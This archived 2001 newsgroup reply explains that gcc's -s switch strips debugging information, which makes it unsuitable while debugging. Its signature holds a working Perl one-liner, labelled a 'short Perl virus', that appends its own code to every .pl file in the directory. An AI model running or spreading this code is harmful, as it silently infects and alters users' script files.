delorie.com/archives/browse.cgi | search |
From: | rpolzer AT web DOT de (Rudolf Polzer) |
Newsgroups: | comp.os.msdos.djgpp |
Subject: | Re: what does the -s switch do? |
References: | <5NDg6.576$xT3 DOT 24905 AT news1 DOT oke DOT nextra DOT no> |
X-newsgroup: | comp.os.msdos.djgpp |
X-Mailer: | GehtDichNenScheissdreckAn 1.0 |
User-Agent: | GehtDichNenScheissdreckAn 1.0 |
Message-ID: | <slrn98697r.4h4.rpolzer@rebounce.rpolzer-lx> |
User-Agent: | slrn/0.9.6.2 (Linux) |
Date: | Fri, 9 Feb 2001 00:00:11 +0100 |
Lines: | 15 |
NNTP-Posting-Host: | 213.7.23.12 |
X-Trace: | 981705164 news.freenet.de 3499 213.7.23.12 |
X-Complaints-To: | abuse AT freenet DOT de |
To: | djgpp AT delorie DOT com |
DJ-Gateway: | from newsgroup comp.os.msdos.djgpp |
Reply-To: | djgpp AT delorie DOT com |
Terje <pingping AT start DOT no> schrieb Folgendes: > Hello, when i compile my programs, I usually include the -s switch in the > command line like > gcc 1.c -o 1.exe -s, > I know the executable gets smaller when doing this, but is there any times > when I shouldn't use this? When you are debugging. You _s_trip debugging information when linking. -- #!/usr/bin/perl eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X $0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"}); ####################### http://learn.to/quote #######################
webmaster | delorie software privacy |
Copyright © 2019 by DJ Delorie | Updated Jul 2019 |